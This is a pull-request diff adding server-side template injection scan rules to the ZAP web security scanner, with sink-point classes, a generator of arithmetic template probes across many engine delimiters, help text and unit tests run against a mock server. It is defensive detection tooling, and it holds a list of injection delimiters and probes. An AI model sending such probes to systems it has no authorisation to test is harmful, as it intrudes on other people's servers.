+    public List<SinkPoint> addSinkPoint(SinkPoint sink) {
+        sinkPoints.add(sink);
+        return sinkPoints;
+    }
+
+    public List<SinkPoint> removeSinkPoint(SinkPoint sink) {
+        sinkPoints.remove(sink);
+        return sinkPoints;
+    }
+
+    public List<SinkPoint> addReferenceReqToAllSinkPoints(
+            HttpMessage request, String param, String payload) {
+        for (SinkPoint sp : sinkPoints) {
+            sp.addReferenceRequest(request, param, payload);
+        }
+        return sinkPoints;
+    }
+}

--- a/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/ssti/ReflectedSinkPoint.java
+++ b/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/ssti/ReflectedSinkPoint.java
@@ -1,0 +1,117 @@
+/*
+ * Zed Attack Proxy (ZAP) and its related class files.
+ *
+ * ZAP is an HTTP/HTTPS proxy for assessing web application security.
+ *
+ * Copyright 2022 The ZAP Development Team
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package org.zaproxy.zap.extension.ascanrulesAlpha.ssti;
+
+import org.parosproxy.paros.network.HttpMessage;
+import org.zaproxy.addon.commonlib.http.ComparableResponse;
+
+/**
+ * Representation of the response to a given request. This can be used to get the state of the sink
+ * and store information about it. The main information stored is the response to the original
+ * request and the response to a reference request. This information may be useful to compare with
+ * the current state of the sink.
+ *
+ * @author DiogoMRSilva (2018)
+ */
+public class ReflectedSinkPoint implements SinkPoint {
+    private float similarityOfReference = 1;
+
+    private ComparableResponse originalComparableResponse;
+
+    private HttpMessage referenceHTTPRequest;
+    private String referencePayload;
+    private ComparableResponse referenceComparableResponse;
+
+    private String sinkLocation;
+
+    private final HttpMessage originalRequest;
+    private final String originalPayload;
+
+    private static final int NOT_DEFINED = -1;
+
+    public ReflectedSinkPoint(HttpMessage request, String payload) {
+        this.originalRequest = request;
+        this.originalPayload = payload;
+        this.sinkLocation = request.getRequestHeader().getURI().toString();
+    }
+
+    public ReflectedSinkPoint(
+            HttpMessage request,
+            String payload,
+            HttpMessage referenceRequest,
+            String referencePayload) {
+        this(request, payload);
+
+        this.referenceHTTPRequest = referenceRequest;
+        this.referencePayload = referencePayload;
+
+        this.sinkLocation = request.getRequestHeader().getURI().toString();
+    }
+
+    private ComparableResponse getOriginalComparableResponse() {
+        if (originalComparableResponse == null) {
+            originalComparableResponse = new ComparableResponse(originalRequest, originalPayload);
+        }
+        return originalComparableResponse;
+    }
+
+    private ComparableResponse getReferenceComparableResponse() {
+        if (referenceComparableResponse == null) {
+            referenceComparableResponse =
+                    new ComparableResponse(referenceHTTPRequest, referencePayload);
+        }
+        return referenceComparableResponse;
+    }
+
+    @Override
+    public float getSimilarityToOriginal(HttpMessage request, String param, String payload) {
+        return getOriginalComparableResponse()
+                .compareWith(new ComparableResponse(request, payload));
+    }
+
+    @Override
+    public float getSimilarityOfReference() {
+        if (similarityOfReference == NOT_DEFINED) {
+            similarityOfReference =
+                    getOriginalComparableResponse().compareWith(getReferenceComparableResponse());
+        }
+        return similarityOfReference;
+    }
+
+    @Override
+    public String getCurrentStateInString(HttpMessage request, String param, String payload) {
+        // Headers should also be checked, example: CVE-2018-14716
+        return request.getResponseBody().toString()
+                + request.getResponseHeader().getHeadersAsString();
+    }
+
+    @Override
+    public String getLocation() {
+        return sinkLocation;
+    }
+
+    @Override
+    public void addReferenceRequest(HttpMessage request, String param, String payload) {
+        referenceHTTPRequest = request;
+        referencePayload = payload;
+        referenceComparableResponse = null;
+        similarityOfReference = NOT_DEFINED;
+    }
+}

--- a/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/ssti/SinkPoint.java
+++ b/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/ssti/SinkPoint.java
@@ -1,0 +1,69 @@
+/*
+ * Zed Attack Proxy (ZAP) and its related class files.
+ *
+ * ZAP is an HTTP/HTTPS proxy for assessing web application security.
+ *
+ * Copyright 2022 The ZAP Development Team
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package org.zaproxy.zap.extension.ascanrulesAlpha.ssti;
+
+import org.parosproxy.paros.network.HttpMessage;
+
+/**
+ * Representation of a location where a given input is shown after being sent. This can be used to
+ * get the state of the sink and compare it with previous states. The classes implementing this
+ * interface should somehow be a able to compare the effect of making a request with the effect
+ * caused by previous ones more specifically the original request and one the programmer chooses as
+ * reference.
+ *
+ * @author DiogoMRSilva (2018)
+ */
+public interface SinkPoint {
+
+    /**
+     * Compare the effect that {@code request} with the {@code payload} in {@code param} makes in
+     * the sink with the effect that the original payload made.
+     *
+     * @param request request which may have caused a change in the sink
+     * @param param the parameter where the payload was inserted
+     * @param payload the payload that was send
+     */
+    float getSimilarityToOriginal(HttpMessage request, String param, String payload);
+
+    /** Returns the similarity that is usual when a payload different from the original is sent */
+    float getSimilarityOfReference();
+
+    /**
+     * Get a string representing the current state of the sink caused by the {@code request} with
+     * the {@code payload} in {@code param}
+     *
+     * @param request request which may have caused a change in the sink
+     * @param param the parameter where the payload was inserted
+     * @param payload the payload that was send
+     */
+    String getCurrentStateInString(HttpMessage request, String param, String payload);
+
+    /** Get a string representing the location of the sink */
+    String getLocation();
+
+    /**
+     * Set {@code request} as reference request
+     *
+     * @param request request which may have caused a change in the sink
+     * @param param the parameter where the payload was inserted
+     * @param payload the payload that was send
+     */
+    void addReferenceRequest(HttpMessage request, String param, String payload);
+}

--- a/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/ssti/StoredSinkPoint.java
+++ b/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/ssti/StoredSinkPoint.java
@@ -1,0 +1,138 @@
+/*
+ * Zed Attack Proxy (ZAP) and its related class files.
+ *
+ * ZAP is an HTTP/HTTPS proxy for assessing web application security.
+ *
+ * Copyright 2022 The ZAP Development Team
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package org.zaproxy.zap.extension.ascanrulesAlpha.ssti;
+
+import java.io.IOException;
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+import org.parosproxy.paros.model.Model;
+import org.parosproxy.paros.network.HttpMessage;
+import org.parosproxy.paros.network.HttpSender;
+import org.zaproxy.addon.commonlib.http.ComparableResponse;
+
+/**
+ * Representation of a location where a given input is reflected after being sent in other location.
+ * This can be used to get the state of the sink and store information about it. The main
+ * information stored is the response to the original request and the response to a reference
+ * request. This information may be useful to compare with the current state of the sink.
+ *
+ * @author DiogoMRSilva (2018)
+ */
+public class StoredSinkPoint implements SinkPoint {
+
+    // Should be to the case there is no reference request defined because
+    // the only reference is the original request
+    private float similarityOfReference = 1;
+
+    private ComparableResponse originalComparableResponse;
+
+    private HttpMessage referenceHTTPRequest;
+    private String referencePayload;
+    private ComparableResponse referenceComparableResponse;
+
+    private String sinkLocation;
+
+    private HttpSender httpSender;
+
+    private final String originalPayload;
+    private final HttpMessage originalRequest;
+
+    private static final int NOT_DEFINED_REQUEST_PENDING = -1;
+    private static final Logger LOG = LogManager.getLogger(StoredSinkPoint.class);
+
+    public StoredSinkPoint(HttpMessage originalSinkRequest, String payload) {
+        originalRequest = originalSinkRequest;
+        originalPayload = payload;
+        sinkLocation = originalSinkRequest.getRequestHeader().getURI().toString();
+
+        httpSender =
+                new HttpSender(
+                        Model.getSingleton().getOptionsParam().getConnectionParam(),
+                        true,
+                        HttpSender.ACTIVE_SCANNER_INITIATOR);
+    }
+
+    @Override
+    public float getSimilarityToOriginal(HttpMessage request, String param, String payload) {
+        HttpMessage updatedRequest = originalRequest.cloneRequest();
+        try {
+            httpSender.sendAndReceive(updatedRequest, false);
+        } catch (IOException e) {
+            LOG.debug(e);
+        }
+        return getOriginalComparableResponse()
+                .compareWith(new ComparableResponse(updatedRequest, payload));
+    }
+
+    private ComparableResponse getOriginalComparableResponse() {
+        if (originalComparableResponse == null) {
+            originalComparableResponse = new ComparableResponse(originalRequest, originalPayload);
+        }
+        return originalComparableResponse;
+    }
+
+    @Override
+    public float getSimilarityOfReference() {
+        if (similarityOfReference == NOT_DEFINED_REQUEST_PENDING) {
+            similarityOfReference =
+                    getOriginalComparableResponse().compareWith(getReferenceComparableResponse());
+        }
+        return similarityOfReference;
+    }
+
+    private ComparableResponse getReferenceComparableResponse() {
+        if (referenceComparableResponse == null) {
+            referenceComparableResponse =
+                    new ComparableResponse(referenceHTTPRequest, referencePayload);
+        }
+        return referenceComparableResponse;
+    }
+
+    @Override
+    public String getCurrentStateInString(HttpMessage request, String param, String payload) {
+        HttpMessage updatedRequest = originalRequest.cloneRequest();
+        try {
+            httpSender.sendAndReceive(updatedRequest, false);
+        } catch (IOException e) {
+            LOG.debug(e);
+        }
+
+        return updatedRequest.getResponseBody().toString()
+                + updatedRequest.getResponseHeader().getHeadersAsString();
+    }
+
+    @Override
+    public String getLocation() {
+        return sinkLocation;
+    }
+
+    @Override
+    public void addReferenceRequest(HttpMessage request, String param, String payload) {
+        referenceHTTPRequest = originalRequest.cloneRequest();
+        referencePayload = payload;
+        try {
+            httpSender.sendAndReceive(referenceHTTPRequest, false);
+        } catch (IOException e) {
+            LOG.debug(e);
+        }
+
+        similarityOfReference = NOT_DEFINED_REQUEST_PENDING;
+    }
+}

--- a/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/ssti/TemplateFormat.java
+++ b/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/ssti/TemplateFormat.java
@@ -1,0 +1,87 @@
+/*
+ * Zed Attack Proxy (ZAP) and its related class files.
+ *
+ * ZAP is an HTTP/HTTPS proxy for assessing web application security.
+ *
+ * Copyright 2022 The ZAP Development Team
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package org.zaproxy.zap.extension.ascanrulesAlpha.ssti;
+
+import java.text.NumberFormat;
+import java.util.ArrayList;
+import java.util.List;
+import java.util.Locale;
+import java.util.Random;
+
+/**
+ * This represents the code that is necessary to execute an arithmetic operation in a template
+ * engine and the expected result of the operation.
+ *
+ * @author DiogoMRSilva (2018)
+ */
+public class TemplateFormat {
+    private static final Random RAND = new Random();
+
+    private final String startTag;
+    private final String endTag;
+    private final String mathOperationFormat;
+
+    static final int MIN = 1111;
+    static final int MAX = 9900;
+
+    public TemplateFormat(String startTag, String endTag, String mathOperationFormat) {
+        this.startTag = startTag;
+        this.endTag = endTag;
+        this.mathOperationFormat = mathOperationFormat;
+    }
+
+    public TemplateFormat(String startTag, String endTag) {
+        this(startTag, endTag, startTag.replace("%", "%%") + "%d*%d" + endTag.replace("%", "%%"));
+    }
+
+    public String getStartTag() {
+        return startTag;
+    }
+
+    public String getEndTag() {
+        return endTag;
+    }
+
+    public int getExpectedResult(int number1, int number2) {
+        return number1 * number2;
+    }
+
+    public List<String> getRenderTestAndResult() {
+
+        ArrayList<String> values = new ArrayList<>();
+
+        int number1 = RAND.nextInt((MAX - MIN) + 1) + MIN;
+        int number2 = RAND.nextInt((MAX - MIN) + 1) + MIN;
+        int operationResult = getExpectedResult(number1, number2);
+
+        String exploit = String.format(this.mathOperationFormat, number1, number2);
+
+        values.add(exploit);
+
+        // 356435234
+        values.add(Integer.toString(operationResult));
+        // 356,435,234
+        values.add(NumberFormat.getNumberInstance(Locale.US).format(operationResult));
+        // 356.435.234
+        values.add(NumberFormat.getNumberInstance(Locale.GERMANY).format(operationResult));
+
+        return values;
+    }
+}

--- a/addOns/ascanrulesAlpha/src/main/javahelp/org/zaproxy/zap/extension/ascanrulesAlpha/resources/help/contents/ascanalpha.html
+++ b/addOns/ascanrulesAlpha/src/main/javahelp/org/zaproxy/zap/extension/ascanrulesAlpha/resources/help/contents/ascanalpha.html
@@ -75,6 +75,15 @@ It will not raise an alert if a similar but safe payload also results in a 400 r
 <p>
 Latest code: <a href="https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/Spring4ShellScanRule.java">Spring4ShellScanRule.java</a>
 
+<H2>Server Side Template Injection</H2>
+This rule attempts to detect situations in which user input might be interpreted as part of the template and processed on the server, versus the user input simply being used as an argument to the template/engine.
+<p>
+Latest code: <a href="https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiScanRule.java">SstiScanRule.java</a>
+
+<H2>Server Side Template Injection (Blind)</H2>
+This rule goes one step further than the SSTI scan rule and attempts to find places where the impact of the user input is not immediately obvious, such as when used by an admin panel, report output, invoice, etc.
+<p>
+Latest code: <a href="https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiBlindScanRule.java">SstiBlindScanRule.java</a>
 
 </BODY>
 </HTML>

--- a/addOns/ascanrulesAlpha/src/main/resources/org/zaproxy/zap/extension/ascanrulesAlpha/resources/Messages.properties
+++ b/addOns/ascanrulesAlpha/src/main/resources/org/zaproxy/zap/extension/ascanrulesAlpha/resources/Messages.properties
@@ -77,3 +77,14 @@ ascanalpha.spring4shell.desc=The application appears to be vulnerable to CVE-202
 ascanalpha.spring4shell.soln=Upgrade Spring Framework to versions 5.3.18, 5.2.20, or newer.
 ascanalpha.spring4shell.refs=https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/\nhttps://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#vulnerability\nhttps://tanzu.vmware.com/security/cve-2022-22965
 
+ascanalpha.sstiblind.name = Server Side Template Injection (Blind)
+ascanalpha.sstiblind.desc = When the user input is inserted in the template instead of being used as argument in rendering is evaluated by the template engine. Depending on the template engine it can lead to remote code execution.
+ascanalpha.sstiblind.soln = Instead of inserting the user input in the template, use it as rendering argument.
+ascanalpha.sstiblind.refs = https://portswigger.net/blog/server-side-template-injection
+ascanalpha.sstiblind.alert.recvdcallback.otherinfo = Received callback from the server.
+
+ascanalpha.ssti.name = Server Side Template Injection
+ascanalpha.ssti.desc = When the user input is inserted in the template instead of being used as argument in rendering is evaluated by the template engine. Depending on the template engine it can lead to remote code execution.
+ascanalpha.ssti.soln = Instead of inserting the user input in the template, use it as rendering argument.
+ascanalpha.ssti.refs = https://portswigger.net/blog/server-side-template-injection
+ascanalpha.ssti.alert.otherinfo = Proof found at [{0}] \ncontent:\n[{1}]

--- a/addOns/ascanrulesAlpha/src/test/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiBlindScanRuleUnitTest.java
+++ b/addOns/ascanrulesAlpha/src/test/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiBlindScanRuleUnitTest.java
@@ -1,0 +1,44 @@
+/*
+ * Zed Attack Proxy (ZAP) and its related class files.
+ *
+ * ZAP is an HTTP/HTTPS proxy for assessing web application security.
+ *
+ * Copyright 2022 The ZAP Development Team
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package org.zaproxy.zap.extension.ascanrulesAlpha;
+
+import org.parosproxy.paros.core.scanner.Plugin;
+
+class SstiBlindScanRuleUnitTest extends ActiveScannerTest<SstiBlindScanRule> {
+
+    @Override
+    protected SstiBlindScanRule createScanner() {
+        return new SstiBlindScanRule();
+    }
+
+    @Override
+    protected int getRecommendMaxNumberMessagesPerParam(Plugin.AttackStrength strength) {
+        int recommendMax = super.getRecommendMaxNumberMessagesPerParam(strength);
+        switch (strength) {
+            case LOW:
+                return recommendMax + 6;
+            case MEDIUM:
+            case HIGH:
+            case INSANE:
+            default:
+                return recommendMax;
+        }
+    }
+}

--- a/addOns/ascanrulesAlpha/src/test/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiScanRuleUnitTest.java
+++ b/addOns/ascanrulesAlpha/src/test/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiScanRuleUnitTest.java
@@ -1,0 +1,278 @@
+/*
+ * Zed Attack Proxy (ZAP) and its related class files.
+ *
+ * ZAP is an HTTP/HTTPS proxy for assessing web application security.
+ *
+ * Copyright 2022 The ZAP Development Team
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package org.zaproxy.zap.extension.ascanrulesAlpha;
+
+import static fi.iki.elonen.NanoHTTPD.newFixedLengthResponse;
+import static org.hamcrest.MatcherAssert.assertThat;
+import static org.hamcrest.Matchers.equalTo;
+import static org.hamcrest.Matchers.greaterThan;
+import static org.hamcrest.Matchers.hasSize;
+import static org.hamcrest.Matchers.lessThanOrEqualTo;
+
+import fi.iki.elonen.NanoHTTPD.IHTTPSession;
+import fi.iki.elonen.NanoHTTPD.Response;
+import java.io.IOException;
+import java.util.regex.Pattern;
+import java.util.stream.Stream;
+import org.apache.commons.lang3.StringUtils;
+import org.junit.jupiter.api.Test;
+import org.junit.jupiter.params.ParameterizedTest;
+import org.junit.jupiter.params.provider.Arguments;
+import org.junit.jupiter.params.provider.EnumSource;
+import org.junit.jupiter.params.provider.MethodSource;
+import org.parosproxy.paros.core.scanner.Alert;
+import org.parosproxy.paros.core.scanner.Plugin;
+import org.parosproxy.paros.core.scanner.Plugin.AlertThreshold;
+import org.parosproxy.paros.core.scanner.Plugin.AttackStrength;
+import org.parosproxy.paros.network.HttpMalformedHeaderException;
+import org.parosproxy.paros.network.HttpMessage;
+import org.zaproxy.zap.testutils.NanoServerHandler;
+import org.zaproxy.zap.utils.ZapXmlConfiguration;
+
+class SstiScanRuleUnitTest extends ActiveScannerTest<SstiScanRule> {
+
+    private static final int SIZESMALLERTHATPOLYGLOT = 12;
+
+    @Override
+    protected SstiScanRule createScanner() {
+        return new SstiScanRule();
+    }
+
+    @Override
+    protected int getRecommendMaxNumberMessagesPerParam(Plugin.AttackStrength strength) {
+        int recommendMax = super.getRecommendMaxNumberMessagesPerParam(strength);
+        switch (strength) {
+            case LOW:
+                return recommendMax;
+            case MEDIUM:
+                return recommendMax + 2;
+            case HIGH:
+                return recommendMax;
+            case INSANE:
+                return recommendMax;
+            default:
+                return recommendMax;
+        }
+    }
+
+    @ParameterizedTest
+    @EnumSource(
+            value = AttackStrength.class,
+            names = {"LOW", "MEDIUM", "HIGH", "INSANE"})
+    void shouldNotReportSstiWithoutRendering(AttackStrength strength)
+            throws NullPointerException, IOException {
+        // Given
+        String test = "/shouldReportSstiInRenderedOutput/";
+        nano.addHandler(
+                new NanoServerHandler(test) {
+                    @Override
+                    protected Response serve(IHTTPSession session) {
+                        String name = getFirstParamValue(session, "name");
+                        String response;
+                        if (name != null) {
+                            response =
+                                    getHtml(
+                                            "sstiscanrule/Rendered.html",
+                                            new String[][] {{"name", name}});
+                        } else {
+                            response = getHtml("sstiscanrule/NoInput.html");
+                        }
+                        return newFixedLengthResponse(response);
+                    }
+                });
+
+        HttpMessage msg = getHttpMessage(test + "?name=test");
+        rule.setAttackStrength(strength);
+        rule.init(msg, parent);
+        // When
+        rule.scan();
+        // Then
+        assertThat(alertsRaised.size(), equalTo(0));
+    }
+
+    @Test
+    void shouldNotDoMathsExecutionTestIfInThresholdLowAndNoSuspectBehavior()
+            throws HttpMalformedHeaderException {
+        // Given
+        String test = "/shouldNotDoMathsExecutionTestIfInThresholdLowAndNoSuspectBehavior/";
+        nano.addHandler(
+                new NanoServerHandler(test) {
+                    @Override
+                    protected Response serve(IHTTPSession session) {
+                        String name = getFirstParamValue(session, "name");
+                        String response;
+                        if (name != null) {
+                            response =
+                                    getHtml(
+                                            "sstiscanrule/Rendered.html",
+                                            new String[][] {{"name", name}});
+                        } else {
+                            response = getHtml("sstiscanrule/NoInput.html");
+                        }
+                        return newFixedLengthResponse(response);
+                    }
+                });
+
+        HttpMessage msg = getHttpMessage(test + "?name=test");
+        rule.setAlertThreshold(AlertThreshold.LOW);
+        rule.setAttackStrength(Plugin.AttackStrength.LOW);
+        rule.init(msg, parent);
+        // When
+        rule.scan();
+        // Then
+        assertThat(httpMessagesSent, hasSize(lessThanOrEqualTo(5)));
+        assertThat(httpMessagesSent, hasSize(greaterThan(0)));
+    }
+
+    @Test
+    void shouldNotConsiderInputSizeErrorsAsStrangeBehavior() throws HttpMalformedHeaderException {
+        // Given
+        String test = "/shouldNotConsiderInputSizeErrorsAsStrangeBehavior/";
+        nano.addHandler(
+                new NanoServerHandler(test) {
+                    @Override
+                    protected Response serve(IHTTPSession session) {
+                        String name = getFirstParamValue(session, "name");
+                        String response;
+                        if (name != null) {
+                            if (name.length() > SIZESMALLERTHATPOLYGLOT) {
+                                name = "Error: the maximum size is " + SIZESMALLERTHATPOLYGLOT;
+                            }
+                            response =
+                                    getHtml(
+                                            "sstiscanrule/Rendered.html",
+                                            new String[][] {{"name", name}});
+                        } else {
+                            response = getHtml("sstiscanrule/NoInput.html");
+                        }
+                        return newFixedLengthResponse(response);
+                    }
+                });
+
+        HttpMessage msg = getHttpMessage(test + "?name=test");
+        rule.setAlertThreshold(AlertThreshold.LOW);
+        rule.setAttackStrength(Plugin.AttackStrength.LOW);
+        rule.init(msg, parent);
+        // When
+        rule.scan();
+        // Then
+        assertThat(httpMessagesSent, hasSize(lessThanOrEqualTo(5)));
+        assertThat(httpMessagesSent, hasSize(greaterThan(0)));
+    }
+
+    private static Stream<Arguments> shouldReportSetSource() {
+        return Stream.of(
+                Arguments.of("{", "}", Plugin.AttackStrength.LOW),
+                Arguments.of("${", "}", Plugin.AttackStrength.LOW),
+                Arguments.of("#{", "}", Plugin.AttackStrength.LOW),
+                Arguments.of("{#", "}", Plugin.AttackStrength.LOW),
+                Arguments.of("{@", "}", Plugin.AttackStrength.LOW),
+                Arguments.of("{{", "}}", Plugin.AttackStrength.LOW),
+                Arguments.of("{{=", "}}", Plugin.AttackStrength.LOW),
+                Arguments.of("<%=", "%>", Plugin.AttackStrength.LOW),
+                Arguments.of("#set($x=", ")${x}", Plugin.AttackStrength.MEDIUM),
+                Arguments.of("<p th:text=\"${", "}\"></p>", Plugin.AttackStrength.MEDIUM));
+    }
+
+    @ParameterizedTest
+    @MethodSource("shouldReportSetSource")
+    void shouldReportSsti(String startTag, String endTag, Plugin.AttackStrength level)
+            throws NullPointerException, IOException {
+        String test = "/shouldReportSsti/";
+        // Given
+        nano.addHandler(
+                new NanoServerHandler(test) {
+                    @Override
+                    protected Response serve(IHTTPSession session) {
+                        String name = getFirstParamValue(session, "name");
+                        String response;
+                        if (name != null) {
+                            try {
+                                name = templateRenderMock(startTag, endTag, name);
+                                response =
+                                        getHtml(
+                                                "sstiscanrule/Rendered.html",
+                                                new String[][] {{"name", name}});
+                            } catch (IllegalArgumentException e) {
+                                response = getHtml("sstiscanrule/ErrorPage.html");
+                            }
+                        } else {
+                            response = getHtml("sstiscanrule/NoInput.html");
+                        }
+                        return newFixedLengthResponse(response);
+                    }
+                });
+
+        HttpMessage msg = getHttpMessage(test + "?name=test");
+        rule.setConfig(new ZapXmlConfiguration());
+        rule.setAttackStrength(level);
+        rule.init(msg, parent);
+        // When
+        rule.scan();
+        // Then
+        assertThat(alertsRaised.size(), equalTo(1));
+        assertThat(alertsRaised.get(0).getRisk(), equalTo(Alert.RISK_HIGH));
+        assertThat(alertsRaised.get(0).getConfidence(), equalTo(Alert.CONFIDENCE_HIGH));
+    }
+
+    private String templateRenderMock(String startTag, String endTag, String input)
+            throws IllegalArgumentException {
+        if (!input.contains(startTag)) {
+            return input;
+        }
+
+        String[] prefixAndRest = input.split(Pattern.quote(startTag), 2);
+        String prefix = prefixAndRest[0];
+
+        if (prefixAndRest.length < 2 || !prefixAndRest[1].contains(endTag)) {
+            return input;
+        }
+
+        String[] expressionAndSuffix = prefixAndRest[1].split(Pattern.quote(endTag), 2);
+        String expression = expressionAndSuffix[0];
+        String suffix = expressionAndSuffix[1];
+        String expressionResult = getSimpleArithmeticResult(expression);
+        return prefix + expressionResult + suffix;
+    }
+
+    private String getSimpleArithmeticResult(String expression) throws IllegalArgumentException {
+        if (expression.contains("+")) {
+            String[] numbers = expression.split(Pattern.quote("+"), 2);
+            if (numbers.length == 1 && expression.endsWith("+")) {
+                throw new IllegalArgumentException("invalid template code");
+            } else if (numbers.length != 2) {
+                throw new IllegalArgumentException("invalid template code");
+            }
+            return Integer.toString((Integer.parseInt(numbers[0]) + Integer.parseInt(numbers[1])));
+        } else if (expression.contains("*")) {
+            String[] numbers = expression.split(Pattern.quote("*"), 2);
+            if (numbers.length == 1 && expression.endsWith("*")) {
+                throw new IllegalArgumentException("invalid template code");
+            } else if (numbers.length != 2) {
+                throw new IllegalArgumentException("invalid template code");
+            }
+            return Integer.toString((Integer.parseInt(numbers[0]) * Integer.parseInt(numbers[1])));
+        } else if (StringUtils.isNumeric(expression)) {
+            return expression;
+        } else {
+            throw new IllegalArgumentException("invalid template code");
+        }
+    }
+}

--- a/addOns/ascanrulesAlpha/src/test/resources/org/zaproxy/zap/extension/ascanrulesAlpha/sstiscanrule/ErrorPage.html
+++ b/addOns/ascanrulesAlpha/src/test/resources/org/zaproxy/zap/extension/ascanrulesAlpha/sstiscanrule/ErrorPage.html
@@ -1,0 +1,10 @@
+<!DOCTYPE html>
+<html>
+    <head>
+        <title>500 Internal Server Error</title>
+    </head>
+    <body>
+        <h1>Internal Server Error</h1>
+        <p>The server encountered an internal error and was unable to complete your request.  Either the server is overloaded or there is an error in the application.</p>
+    </body>
+</html>

--- a/addOns/ascanrulesAlpha/src/test/resources/org/zaproxy/zap/extension/ascanrulesAlpha/sstiscanrule/NoInput.html
+++ b/addOns/ascanrulesAlpha/src/test/resources/org/zaproxy/zap/extension/ascanrulesAlpha/sstiscanrule/NoInput.html
@@ -1,0 +1,14 @@
+<!DOCTYPE html>
+<html>
+    <head>
+        <title>SSTI</title>
+    </head>
+    <body>
+        <form action="/" method="post">
+            First name:<br>
+            <input type="text" name="name" value="">
+            <input type="submit" value="Submit">
+        </form>
+        <h2>Hello </h2>
+    </body>
+</html>

--- a/addOns/ascanrulesAlpha/src/test/resources/org/zaproxy/zap/extension/ascanrulesAlpha/sstiscanrule/Rendered.html
+++ b/addOns/ascanrulesAlpha/src/test/resources/org/zaproxy/zap/extension/ascanrulesAlpha/sstiscanrule/Rendered.html
@@ -1,0 +1,14 @@
+<!DOCTYPE html>
+<html>
+    <head>
+        <title>SSTI</title>
+    </head>
+    <body>
+        <form action="/" method="post">
+            First name:<br>
+            <input type="text" name="name" value="">
+            <input type="submit" value="Submit">
+        </form>
+        <h2>Hello @@@name@@@</h2>
+    </body>
+</html>


### PR DESCRIPTION
The SSTI scanner is ready.
I have some real tests in https://github.com/DiogoMRSilva/websitesVulnerableToSSTI but I don't know how to integrate them. 

Sorry for the delay and thanks for your help. I look forward to hearing from you.

---
@kingthorin's TODO list:
- [x] Currently [extracting ComparableResponse and adding a <bleep> ton of unit tests](https://github.com/zaproxy/zap-extensions/pull/3435).
- [x] Make this PR use the new component.
- [x] Address logging changes.
- [x] Address callback changes (use oast).
- [x] Address sonarlint items.
- [x] Move rule to ascanrules Alpha
- [x] Add help.
- [x] Relocate PersistentXSSUtils to commonlib. (zaproxy/zap-extensions#3675)
    - [x] Rebase this and leverage moved component.
 - [x]  Use [`org.apache.commons.lang3.RandomStringUtils.random(int, String)`](https://commons.apache.org/proper/commons-lang/apidocs/org/apache/commons/lang3/RandomStringUtils.html#random-int-java.lang.String-) instead of [`randomStringFromAlphabet`](https://github.com/zaproxy/zap-extensions/pull/2149#discussion_r839806594). 
